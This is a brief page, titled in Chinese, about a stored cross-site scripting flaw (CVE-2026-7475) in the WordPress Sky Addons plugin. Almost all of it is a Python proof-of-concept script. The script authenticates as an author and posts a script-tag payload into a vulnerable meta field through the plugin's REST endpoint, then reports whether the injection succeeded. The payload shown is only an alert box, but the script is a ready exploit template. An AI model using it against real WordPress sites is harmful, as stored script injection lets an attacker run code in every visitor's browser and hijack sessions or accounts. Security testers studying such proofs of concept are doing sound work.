CVE-2026-7475: WordPress Sky Addons存储型XSS漏洞

import requests # Target configuration target_url = "http://example.com/wp-json/wp/v2/sky-custom-scripts" username = "author" password = "password" # Malicious payload to be stored payload = "<script>alert('CVE-2026-7475');</script>" # Headers for REST API authentication (Basic Auth) headers = { "Content-Type": "application/json" } # Data payload data = { "title": "Malicious Script", "content": "Some content", "status": "publish", "meta": { "sky_script_content": payload # The vulnerable field } } # Send POST request to inject the script response = requests.post(target_url, json=data, headers=headers, auth=(username, password)) if response.status_code == 201: print(f"Success! Payload injected. ID: {response.json().get('id')}") else: print(f"Failed. Status code: {response.status_code}") print(response.text)